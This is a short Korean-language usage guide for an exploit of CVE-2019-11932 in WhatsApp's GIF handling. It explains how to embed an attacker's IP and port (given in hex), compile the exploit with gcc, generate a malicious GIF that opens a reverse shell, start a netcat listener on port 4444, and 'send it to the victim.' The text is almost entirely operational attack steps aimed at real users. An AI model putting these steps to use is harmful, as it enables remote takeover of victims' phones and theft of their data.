
CVE-2019-11932에 대한 익스플로잇으로, WhatsApp의 GIF 파싱(버전 ≤2.19.230)에서 발생하는 버퍼 오버플로우입니다. 공격자가 지정한 IP 및 포트로 리버스 셸을 트리거하는 악성 GIF를 컴파일합니다.
exploit.c 파일에서 리스닝 주소(공격자 주소)와 리스닝 포트를 수정하세요
다음 16진수 코드:
3139 322e 3136
382e 322e 3732 2034 3434 3420
코드 컴파일:
gcc -o exploit egif_lib.c exploit.c
컴파일된 파일 실행: ./exploit exploit.gif
출력물을 GIF에 복사/붙여넣기
netcat 리스너 실행:
nc -lvp 4444
피해자에게 전송하세요!
영향받는 버전: 2.19.230 이하
공식적으로 2.19.244 버전에서 패치됨
출처: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
Linkedin : https://www.linkedin.com/in/thomas-lounis-749456175/